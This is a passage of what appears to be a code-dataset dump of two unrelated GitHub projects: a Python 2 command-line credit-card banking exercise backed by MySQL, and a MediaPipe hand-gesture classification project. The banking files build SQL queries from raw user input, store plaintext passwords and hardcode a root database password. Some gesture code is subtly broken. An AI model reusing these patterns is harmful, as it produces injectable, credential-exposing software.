+ \"'\" + \";\"\n interest = mysql.mysql(sql_cmd,'select')\n if float(money) >= int(salary):\n print '\\033[35m您无需还款,目前您的余额为:%s\\033[0m' %money\n else:\n print '\\033[35m您需要还款的金额为:%s,其中利息为%s.\\033[0m' % (str(int(salary) - float(money)+float(interest)),str(interest))\n elif input_num == \"2\":\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n print \"\\033[35m 您现在信用卡的金额为 %s \\033[0m\" %money\n num = 0\n while True:\n if num == 3:\n print(\"您输入错误已经达到3次!\")\n break\n money_num = raw_input('\\033[31m请输入您要还款的金额:\\033[0m').strip()\n #判断输入的是否是数字\n if money_num.isdigit():\n sql_cmd = \"select interest from user where name = \" + \"'\" + names + \"'\" + \";\"\n interest = mysql.mysql(sql_cmd,'select')\n if int(money_num) > float(interest):\n new_money = float(money) + int(money_num) - float(interest)\n interest = \"0\"\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(new_money,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n sql_cmd = \"update user set interest = \" +\"'\"+ str(interest)+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print \"\\033[35m 您本次还款成功! \\033[0m\"\n print \"\\033[35m 您现在信用的金额为 %s \\033[0m\" %str(round(new_money,2))\n sql_cmd = \"select salary from user where name = \" + \"'\" + names + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n if float(new_money) >= int(salary):\n sql_cmd = \"update user set str_interest = '0'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n else:\n interest = float(interest) - int(money_num)\n sql_cmd = \"update user set interest = \" +\"'\"+ str(round(interest,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n new_money = money\n if interest == 0:\n print \"您本次还款只还清了利息!\"\n else:\n print \"您本次还款只还了利息的%s,您还有%s利息要还!\" %(money_num,round(interest,2))\n break\n else:\n num += 1\n print('\\033[31m您输入的金额有误,请重新输入!\\033[0m')\n continue\n price = '+'+str(money_num)\n logger.record_log(names,'repay_money','----',price,new_money)\n elif input_num == \"3\":\n break\n elif input_num == \"4\":\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请您输入 1 or 2 or 3 or 4####################\\033[0m\"\n\ndef change_passwd():\n #跳出第一层循环标识\n first_break = False\n while True:\n if first_break:\n break\n print 100*'#'\n print ' 1 修改密码 2 返回上级菜单 3 退出 \\n'\n print 100*'#'\n input_num = raw_input('\\033[31m请您选择[1, 2, 3]: \\033[0m').strip()\n if input_num == \"1\":\n #输入旧密码次数的标识\n second_count_flag = 0\n #跳出输入旧密码的循环标识\n second_break = False\n while True:\n if second_break:\n break\n #输入旧密码\n #old_passwd = getpass.getpass('\\033[31m请输入您的旧密码:\\033[0m').strip()\n print '\\033[31m请输入您的旧密码:\\033[0m',\n old_passwd = passwd_getpass.getpass(\"*\")\n # print old_passwd,passwd\n if old_passwd == passwd:\n #输入新密码两次不一致的次数\n third_count_flag = 0\n #输入新密码不符合规则的次数\n third_count_flags = 0\n third_break = False\n while True:\n if third_break:\n break\n # new_passwd1 = getpass.getpass('\\033[31m请您输入您的新密码:\\033[0m').strip()\n # new_passwd2 = getpass.getpass('\\033[31m请再次您输入您的新密码:\\033[0m').strip()\n print '\\033[31m请您输入您的新密码:\\033[0m',\n new_passwd1 = passwd_getpass.getpass(\"*\")\n print '\\033[31m请再次您输入您的新密码:\\033[0m',\n new_passwd2 = passwd_getpass.getpass(\"*\")\n if new_passwd1 == new_passwd2:\n if len(new_passwd2) > 6 and not new_passwd2.isdigit():\n print \"\\033[31m您修改的密码已经成功!\\033[0m\"\n sql_cmd = 
\"update user set password = \" + \"'\" + new_passwd2 + \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n first_break = True\n second_break = True\n third_break = True\n else:\n third_count_flags += 1\n print \"您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\"\n if third_count_flags == 3:\n print \"###############您输入的次数已经达到3次,请一会再修改!################\"\n second_break = True\n third_break = True\n\n else:\n third_count_flag += 1\n print \"###############您两次输入的密码不一致!################\"\n if third_count_flag == 3:\n print \"###############您输入的次数已经达到3次,请一会再修改!################\"\n print '\\n'\n second_break = True\n third_break = True\n else:\n second_count_flag += 1\n print \"#################您输入的密码是错误的!###################\"\n if second_count_flag == 3:\n print \"###############您设置的次数已经达到3次,请一会再修改!################\"\n print '\\n'\n second_break = True\n third_break = True\n elif input_num == \"2\":\n first_break = True\n elif input_num == \"3\":\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请您输入 1 or 2 or 3####################\\033[0m\"\n\ndef decorate(func):\n def inner():\n is_login = login()\n if not is_login[0]:\n return None\n global names\n global passwd\n names=is_login[1]\n passwd=is_login[2]\n func()\n return inner\n\n@decorate\ndef bank():\n while True:\n print 100*'#'\n print '''\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n '''\n print 100*'#'\n print \"\\033[35m如果你想返回上一级菜单请输入'7'!\\033[0m\"\n num_input = raw_input('\\033[31m请您选择[1, 2, 3, 4]: \\033[0m').strip()\n if num_input == '1':\n display_money()\n elif num_input == '2':\n take_money()\n elif num_input == '3':\n transfer_money()\n elif num_input == '4':\n repay_money()\n elif num_input == '5':\n change_passwd()\n elif num_input == '6':\n sys.exit(\"GOODBye!\")\n elif num_input == '7':\n break\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 or 5 or 6 ####################\\033[0m\"\n\nif __name__ == \"__main__\":\n bank()" }, { "alpha_fraction": 0.45943987369537354, "alphanum_fraction": 0.4741670787334442, "avg_line_length": 43.54838562011719, "blob_id": "a766478010127e0d571091d221850b18389bca68", "content_id": "3309e180f135a502d23e464f1ed4eaca24986490", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5194, "license_type": "no_license", "max_line_length": 135, "num_lines": 93, "path": "/core/login.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom apis import mysql,passwd_getpass,Caltimes\nimport sys,time\n\n#用户的账号和密码验证函数\ndef login():\n #输错密码的标识\n count_flag = 0\n #跳出循环的标识\n break_flag = False\n #因为下面有别的函数需要用到这两个值,所以设成了全局变量\n global names\n global passwd\n #try子块在这边有点鸡肋\n try:\n while True:\n #输入账号\n names = raw_input(\"\\033[31m首先您需要输入您的账号(退出请输入'q'):\\033[0m\").strip()\n #查询这个账号存不存在\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + names + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n #如果输入的账号是空的,就结束本次循环\n if names == '':\n print \"您输入账号是空,请再输入账号!\"\n continue\n elif names == 'q':\n is_login = False\n print \"GOODBye!\"\n break\n #如果输入的账号存在就执行下面的语句\n elif names == ret_value:\n #查询该账号status字段的信息\n sql_cmd = \"select status from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查找该账号的状态\n status = mysql.mysql(sql_cmd,'select')\n #查询该账号的锁住时间\n sql_cmd = \"select lock_time from user where name = \" + \"'\" + names + \"'\" + \";\"\n lock_time = 
mysql.mysql(sql_cmd,'select')\n #计算出锁定时间和当前时间相差多少分钟\n minutes = Caltimes.Caltime(lock_time,time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime()))/60\n #如果status为lock并且时间差值小于等于10分钟的话,就退出程序\n if status == 'lock' and minutes <= 10:\n sys.exit(\"您的账号处于锁定状态,需要再等待%s分钟以后就自动解锁!\" %(10 - minutes))\n #如果status为lock并且时间差值大于10分钟的话,就去修改status的值为unlock\n elif status == 'lock' and minutes > 10:\n sql_cmd = \"update user set status='unlock' where name = '\" + names + \"';\"\t#将status字段值更改为unlock\n mysql.mysql(sql_cmd,'update')\n #如果status为unlock的就执行下面的语句\n while True:\n # passwd = raw_input('\\033[31m请输入您的密码:\\033[0m').strip()\t#输入该账号的密码\n print \"\\033[31m请输入您的密码(退出请输入'q'):\\033[0m\",\n passwd = passwd_getpass.getpass(\"*\")\n # passwd = getpass.getpass(\"\\033[31m请输入您的密码(退出请输入'q'):\\033[0m\").strip()\t#输入该账号的密码\n #通过之前输入的names来查询它的passwd\n sql_cmd = \"select password from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查找该账号在数据库中的值\n ret_value = mysql.mysql(sql_cmd,'select')\n #判断输入的密码和数据库中的密码是否相等,如果相等就将break_flag改成True,并跳出循环\n if passwd == 'q':\n is_login = False\n break_flag = True\n print \"GOODBye!\"\n break\n elif ret_value == passwd:\n break_flag = True\n is_login = True\n break\n else:\n #如果输入的密码错误就计数加1\n count_flag += 1\n print \"对不起,您输入的密码是错误的,您还有%s机会!\" %(3 - count_flag)\n #输错密码达到3次就锁住该账号\n if count_flag == 3:\n sql_cmd = \"update user set status='lock' where name = '\" + names + \"';\"\t\t#修改数据库中status字段的值\n mysql.mysql(sql_cmd,'update')\n lock_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n sql_cmd = \"update user set lock_time='\" + lock_time +\"' where name = '\" + names + \"';\"\t#修改数据库中lock_time字段的值\n mysql.mysql(sql_cmd,'update')\n sys.exit(\"您的账号将被锁住,请等待10分钟以后自动解锁,谢谢!\")\n # is_login = False\n #判断是否要跳出整个循环\n if break_flag:\n break\n else:\n print \"您输入的账号不存在!\"\n #is_login = True\n ret_login = [is_login,names,passwd]\n return ret_login\n # except NameError:\n # print \"MySQL服务器还没有启动!\"\n except KeyboardInterrupt:\n print \"请不要打断我,我正在做重要的事情,谢谢!\"" }, { "alpha_fraction": 0.5476838946342468, "alphanum_fraction": 0.5858310461044312, "avg_line_length": 20.647058486938477, "blob_id": "6598b406380dfb027775eaa2deb15fc3e289013e", "content_id": "a63d38b8deaf0610467750427c77fd014e356c79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 367, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/config/setting.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nimport sys,os\nbase_dir = '/'.join(os.path.abspath(os.path.dirname(__file__)).split(\"/\")[:-1])\nsys.path.append(base_dir)\n\nDATABASE = {\n \"engine\":\"mysql\",\n \"host\":\"localhost\",\n \"port\":3307,\n \"user\":\"root\",\n \"password\":\"123456\",\n \"unix_socket\":\"/tmp/mysql_3307.sock\",\n}\n\nlogfile_dir = \"/root/s12/day05\"" }, { "alpha_fraction": 0.4597359597682953, "alphanum_fraction": 0.499009907245636, "avg_line_length": 34.22093200683594, "blob_id": "2cc7ad72a945fbf8d3487dd746a000b7a54a17ee", "content_id": "3b57fb50b028b8e62e471f7571a03111505f642d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3418, "license_type": "no_license", "max_line_length": 123, "num_lines": 86, "path": "/core/manager.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom login import login\nfrom apis import 
mysql,logger,passwd_getpass\nfrom core import register\nimport sys,time\n\ndef add_account():\n register.register()\n\ndef change_salary():\n num = 0\n while True:\n if num == 3:\n print(\"您输入的错误已经达到3次!\")\n break\n num_input = raw_input(\"\\033[35m请输入您想要调整额度的账号:\\033[0m\")\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + num_input + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if num_input == ret_value:\n sql_cmd = \"select salary from user where name = \" + \"'\" + num_input + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n print \"目前%s账号的额度为:%s\" %(num_input,salary)\n money = raw_input(\"\\033[35m请输入您想要调整额度:\\033[0m\")\n if money.isdigit():\n sql_cmd = \"update user set salary = \" +\"'\"+ str(money)+ \"'\" + \"where name = \" + \"'\" + num_input + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print('\\033[31m您调整的额度已成功!\\033[0m')\n break\n else:\n num += 1\n print('\\033[31m您输入的金额有误,请重新输入!\\033[0m')\n else:\n print \"您输入的账号不存在!\"\n\ndef lock_account():\n num_input = raw_input(\"\\033[35m请输入您想要冻结的账号:\\033[0m\")\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + num_input + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if num_input == ret_value:\n sql_cmd = \"update user set status='lock' where name = '\" + ret_value + \"';\"\t\t#修改数据库中status字段的值\n mysql.mysql(sql_cmd,'update')\n lock_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n sql_cmd = \"update user set lock_time='\" + lock_time +\"' where name = '\" + ret_value + \"';\"\t#修改数据库中lock_time字段的值\n mysql.mysql(sql_cmd,'update')\n print(\"您已经将%s账号冻结10分钟!\" %num_input)\n else:\n print \"您输入的账号不存在!\"\n\ndef decorate(func):\n def inner():\n is_login = login()\n if not is_login[0]:\n return None\n names=is_login[1]\n if names == 'root':\n func()\n else:\n print \"您不是管理员,不能进行登陆!\"\n return inner\n\n@decorate\ndef root_manager():\n while True:\n print 30*'#','\\033[35m欢迎您登陆管理员界面!\\033[0m',30*'#'\n print 86*'#'\n print '''\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n '''\n print \"\\033[35m如果你退出请按'5'!\\033[0m\"\n num_input = raw_input(\"\\033[35m请输入您想要的选项:\\033[0m\")\n if num_input == \"1\":\n add_account()\n elif num_input == \"2\":\n change_salary()\n elif num_input == \"3\":\n lock_account()\n elif num_input == \"4\":\n break\n elif num_input == \"5\":\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 or 5 ####################\\033[0m\"\n\n" }, { "alpha_fraction": 0.409531831741333, "alphanum_fraction": 0.4576128125190735, "avg_line_length": 39.20338821411133, "blob_id": "32b840502de2dc9592b018e3e44c09154e642001", "content_id": "b373dcc058a194ea36ecbf213944e1d78269b8e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2695, "license_type": "no_license", "max_line_length": 167, "num_lines": 59, "path": "/core/register.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom apis import mysql,passwd_getpass\nimport random\n\n#账号注册\ndef register():\n first_break = False\n while True:\n if first_break:\n break\n #输入申请的账号\n user_name = raw_input(\"\\033[31m请输入账号名:\\033[0m\")\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + user_name + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n #如果输入的账号是空的,就结束本次循环\n if user_name == '':\n print \"\\033[31m您输入账号是空,请再输入账号!\\033[0m\"\n continue\n elif user_name == 
ret_value:\n print \"\\033[31m您输入账号已经存在!\\033[0m\"\n continue\n first_count_flags = 0\n second_count_flags = 0\n while True:\n print '\\033[31m请您输入您的密码:\\033[0m',\n new_passwd1 = passwd_getpass.getpass(\"*\")\n print '\\033[31m请再次您输入您的密码:\\033[0m',\n new_passwd2 = passwd_getpass.getpass(\"*\")\n if new_passwd1 == new_passwd2:\n if len(new_passwd2) > 6 and not new_passwd2.isdigit():\n salary = random.choice([10000,20000,30000,40000,50000])\n sql_cmd = \"insert into user(name,password,salary,money,status,lock_time,interest) values(\" +\\\n \"'\"+ user_name +\"',\" +\"'\" + new_passwd2 + \"',\"+ \"'\"+ str(salary) +\"',\"+\"'\"+ str(salary) +\"',\"+\"'unlock','2015-06-08 20:56:09','0')\" + \";\"\n mysql.mysql(sql_cmd,'insert')\n print \"\\033[31m您创建密码已经成功!并且您的信用卡已经申请成功,限额为%s \\033[0m\" %salary\n first_break = True\n break\n else:\n first_count_flags += 1\n print \"您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\"\n if first_count_flags == 3:\n print \"###############你申请账号失败!################\"\n print '\\n'\n first_break = True\n break\n else:\n second_count_flags += 1\n print \"###############您两次输入的密码不一致!################\"\n if second_count_flags == 3:\n print \"################你申请账号失败!###############\"\n print '\\n'\n first_break = True\n break\n\nif __name__ == \"__main__\":\n register()" } ]
15
shreyas0906/Hand-pose-classification
https://github.com/shreyas0906/Hand-pose-classification
c060fc88aac5f1e82233560421bfbb6363e97e49
030e67bc60e42febe86f2eb0389758426ea8d0ea
8035b2fd27e59955e9e246f0bfca2ac152460155
refs/heads/main
2023-08-24T02:31:49.802166
2021-11-01T09:47:08
2021-11-01T09:47:08
414,220,036
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6956856846809387, "alphanum_fraction": 0.7080123424530029, "avg_line_length": 28.477272033691406, "blob_id": "f37b5f3f900c254e14d45e5cad00081c475614d5", "content_id": "33f35b39dac65bedc418783e410ebc76c22442f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 100, "num_lines": 44, "path": "/misc/tflite_exp.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy.lib.shape_base import expand_dims\nimport tensorflow as tf\nimport cv2 \nimport mediapipe as mp \n\n# Load TFLite model and allocate tensors.\ninterpreter = tf.lite.Interpreter(model_path=\"../mediapipe_tflite_models/pose_landmark_full.tflite\")\ninterpreter.allocate_tensors()\n\n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nprint(f\"\\ninput_details: {input_details}\")\nprint(f\"\\noutput details: {output_details}\")\nprint(f\"\\n\")\n\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\ncap = cv2.VideoCapture(0)\n\nwhile cap.isOpened():\n\n success, image = cap.read()\n image = image.astype(np.float32)\n image_width, image_height, _ = image.shape\n print(f\"image width: {image_width} and image height: {image_height}\")\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n # If loading a video, use 'break' instead of 'continue'.\n continue\n \n image = cv2.resize(image, (255,255))\n image = np.expand_dims(image, axis=0)\n print(f\"image shape: {image.shape}\")\n interpreter.set_tensor(input_details[0]['index'], 1)\n interpreter.invoke()\n results = interpreter.get_tensor(output_details[0]['index'])\n print(results)\n\ncap.release()\n\n" }, { "alpha_fraction": 0.6450638175010681, "alphanum_fraction": 0.6474143862724304, "avg_line_length": 35.317073822021484, "blob_id": "6c8b9252f6938201cec33295d84aa6319b6ca323", "content_id": "91f8909b70d95b7ffe02330968c59685a9d2daf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 151, "num_lines": 82, "path": "/utils/Gesture.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "from utils import Hand\nimport numpy as np \n\nclass Gesture(Hand):\n\n def __init__(self):\n super().__init__()\n # self.type = None # return the type of gesture given the landmarks.\n\n def is_ok(self):\n\n distance = np.linalg.norm(self.index_finger - self.thumb) * 100\n\n if 0.5 < distance < 3.0:\n return True\n return False\n\n def is_five(self):\n pass\n\n def is_four(self):\n \n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n pinky_finger_above_palm = self.is_point_above_palm_line(self.pinky_finger)\n thumb_finger_below_palm = self.is_point_above_plam_line(self.thumb)\n\n if index_finger_above_palm and middle_finger_above_palm and ring_finger_above_palm and pinky_finger_above_palm and not thumb_finger_below_palm:\n return True\n\n return False\n\n\n def is_three(self):\n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = 
self.is_point_above_palm_line(self.ring_finger)\n thumb_ip = self.is_point_above_palm_line(self.thumb_ip)\n pinky_finger = self.is_point_above_palm_line(self.pinky_finger)\n\n if (index_finger_above_palm and middle_finger_above_palm and ring_finger_above_palm) and not (thumb_ip and pinky_finger):\n return True\n \n return False\n\n\n def is_two(self):\n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n thumb_ip = self.is_point_above_palm_line(self.thumb_ip)\n pinky_finger = self.is_point_above_palm_line(self.pinky_finger)\n\n if (index_finger_above_palm and middle_finger_above_palm) and not (ring_finger_above_palm and thumb_ip and pinky_finger):\n return True\n \n return False\n\n def is_hang(self):\n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n thumb_ip = self.is_point_above_palm_line(self.thumb_ip)\n pinky_finger = self.is_point_above_palm_line(self.pinky_finger)\n \n if not (index_finger_above_palm and middle_finger_above_palm and ring_finger_above_palm and thumb_ip) and pinky_finger:\n return True\n \n return False\n\n def is_heavy(self):\n pass\n\n def is_L(self):\n pass\n\n def is_C(self):\n pass\n\n def is_palm(self):\n pass\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6320939064025879, "avg_line_length": 35.5, "blob_id": "5526a7d699b863c87493005f624b7fde6b2b6936", "content_id": "d611905c4afd18d8147334069712b17bd4491de4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 511, "license_type": "no_license", "max_line_length": 70, "num_lines": 14, "path": "/utils/get_camera_by_index.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import time\nimport cv2\n\nfor camera_index in range(5, -1, -1):\n camera = cv2.VideoCapture(camera_index)\n print(f\"checking for camera input at index: {camera_index}\")\n test, frame = camera.read()\n if test and frame is not None:\n if camera_index > 1:\n print(f\"external camera found at index: {camera_index}\")\n else:\n print(f\"built-in camera found at index: {camera_index}\")\n print(f\"camera resolution: {frame.shape[0]} {frame.shape[1]}\")\n camera.release()\n" }, { "alpha_fraction": 0.5125786066055298, "alphanum_fraction": 0.5361635088920593, "avg_line_length": 26.65217399597168, "blob_id": "c68d26f716f5e9f633b8e17296d2c4a03c95d821", "content_id": "07fbf94e8f73cbc51176d03a710da7fa0755f12e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 636, "license_type": "no_license", "max_line_length": 86, "num_lines": 23, "path": "/src/checkpoints.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau\n\ndef model_checkpoint(save_path):\n return ModelCheckpoint(save_path,\n monitor='accuracy',\n verbose=1,\n save_best_only=True, \n mode='max')\n\ndef tensorboard():\n return TensorBoard(log_dir='logs')\n\ndef reduce_lr_on_plateau():\n return ReduceLROnPlateau(\n monitor=\"accuracy\",\n factor=0.1,\n patience=3,\n verbose=0,\n mode=\"auto\",\n min_delta=0.01,\n cooldown=0,\n min_lr=0.00001,\n )\n" }, 
{ "alpha_fraction": 0.6652777791023254, "alphanum_fraction": 0.675000011920929, "avg_line_length": 35, "blob_id": "93cfed7eadeb9720005ba879f2d6e0f2b201f62c", "content_id": "a2f931b452e9543fa3c0a25ad1fe6807fceb02ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "no_license", "max_line_length": 105, "num_lines": 20, "path": "/utils/gesture_filter.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np \n\ndef is_valid_ok(mp_hands, hand_landmarks):\n\n index_finger = np.array((float(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x ),\n float(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y )))\n\n thumb_finger = np.array((float(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].x ),\n float(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].y)))\n\n #calculating the distance between index finger tip and thumb finger tip\n distance = np.linalg.norm(index_finger - thumb_finger) * 100\n\n if 0.5 < distance < 3.0:\n return True\n \n return False\n\ndef L_gesture(mp_hands, hand_landmarks):\n pass\n" }, { "alpha_fraction": 0.5077044367790222, "alphanum_fraction": 0.5270643830299377, "avg_line_length": 34.15277862548828, "blob_id": "274b0113fbbb79689233a4df22880da09b654ec3", "content_id": "91e01bdc7901382c1c7faef4a3ad9fc5b8cb9f84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2531, "license_type": "no_license", "max_line_length": 122, "num_lines": 72, "path": "/utils/augment.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "\"\"\"\nThis code is for MultiMoodHandGestRecog dataset\nlink: https://www.gti.ssr.upm.es/images/Data/Downloads/MultiModalHandGestureDataset/MultiModHandGestRecog.rar\n\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport os\nimport glob\nimport tqdm \nfrom argparse import ArgumentParser\nfrom rotate import rotate_image, random_rotation\n\n# \"/media/zeki/Data/Dataset/MultiModHandGestRecog/near-infrared/\"\n\n\ndef img_aug(args):\n src_path = args.image_dir\n ang_1 = -25\n ang_2 = 25\n # user = os.listdir(src_path)\n # for usr in user:\n folder = ['five','four','three','two','C','heavy','hang','L','ok','palm','palm_u']\n for dir in tqdm.tqdm(folder):\n print(f\"Processing: {dir}\")\n imgs = glob.glob(src_path + dir + \"/*.png\") # + usr + \"/train_pose/\"\n dest = \"/aug-\" + dir + \"/\" \n if not os.path.exists(src_path + dir + dest):\n os.mkdir(src_path + dir + dest) # usr + \"/train_pose/\" \n for img in imgs:\n print(f\"Processing image: {img}\")\n\n image = cv2.imread(img)\n image = cv2.resize(image, (640,480))\n \n #flipping\n \"\"\"\n save image in same folder as F_image_name\n \"\"\"\n \n f_img = image.copy()\n f_img = cv2.flip(f_img, 1)\n f_img = cv2.resize(f_img, (640, 480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_F_%s\"%str(img).split(\"/\")[-1], f_img) #usr + \"/train_pose/\"\n # cv2.imwrite(src_path + dir + img, image) # usr + \"/train_pose/\" +\n #random_rotation\n \"\"\"\n save image in same folder as R_image_name\n \"\"\"\n r_img = image.copy()\n r_img = random_rotation(r_img, ang_1, ang_2)\n r_img = cv2.resize(r_img, (640, 480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_R_%s\"%str(img).split(\"/\")[-1], r_img) # usr + \"/train_pose/\" +\n \n #ramdom_rotation_and_flipping\n \"\"\"\n save image in same folder as R_F_image_name\n \"\"\"\n r_f_img = image.copy()\n r_f_img = 
cv2.flip(r_f_img, 1)\n r_f_img = cv2.resize(r_f_img, (640, 480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_R_F_%s\"%str(img).split(\"/\")[-1], r_f_img) # usr + \"/train_pose/\" +\n\n \n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--image_dir', type=str, default='./', help='Directory containing the images')\n print(p.format_usage())\n args = p.parse_args()\n img_aug(args)\n" }, { "alpha_fraction": 0.5175231099128723, "alphanum_fraction": 0.5338636636734009, "avg_line_length": 45.049503326416016, "blob_id": "849c318438cdb83511152575ca51a41343676994", "content_id": "600778287732cf40215ca2d88d8ace02be2423b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4651, "license_type": "no_license", "max_line_length": 119, "num_lines": 101, "path": "/mediapipe_hands_demo_video.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\nvideo_folder = \"Video/\"\ncap = cv2.VideoCapture(2)\n\nfps = cap.get(cv2.CAP_PROP_FPS)\nprint(f\"FPS: {fps}\")\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\nwith mp_hands.Hands(\n min_detection_confidence=0.7,\n min_tracking_confidence=0.7) as hands:\n while cap.isOpened():\n start = time.time()\n success, image = cap.read()\n frame = image.copy()\n\n image_width, image_height, _ = image.shape\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n # If loading a video, use 'break' instead of 'continue'.\n continue\n\n # Flip the image horizontally for a later selfie-view display, and convert\n # the BGR image to RGB.\n\n image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n filler_image = cv2.cvtColor(gray_image, cv2.COLOR_GRAY2BGR)\n\n # To improve performance, optionally mark the image as not writeable to\n # pass by reference.\n image.flags.writeable = False\n results = hands.process(filler_image) # filler_image\n\n # Draw the hand annotations on the image.\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n for point in mp_hands.HandLandmark:\n index_finger_mcp = np.array((int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].y * image_width)))\n\n middle_finger_mcp = np.array(\n 